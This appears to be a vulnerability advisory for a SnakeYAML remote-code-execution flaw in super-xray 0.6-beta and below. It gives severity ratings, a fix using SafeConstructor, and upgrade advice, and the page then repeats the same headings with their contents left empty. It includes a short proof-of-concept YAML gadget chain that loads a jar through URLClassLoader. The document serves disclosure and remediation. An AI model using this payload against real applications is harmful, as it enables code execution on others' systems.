Severity
- 安全级别:Moderate
- 攻击向量:本地
- 攻击复杂度:低
- 需要权限:高
- 用户交互:是
- 范围:无更改
- 机密性影响:高
- 完整性影响:高
- 可用性影响:高
Vendor
super-xray
Versions Affected
0.6-beta and below
Description
SnakeYAML RCE
ScreenShot:

PoC:
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["file:./yaml.jar"]
]]
]
Fix:
Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions()));
Mitigation
users should upgrade to super-xray 0.7
Credit
This issue was discovered by super-xray development team
Severity
Vendor
super-xray
Versions Affected
0.6-beta and below
Description
SnakeYAML RCE
ScreenShot:
PoC:
Fix:
Mitigation
users should upgrade to super-xray 0.7
Credit
This issue was discovered by super-xray development team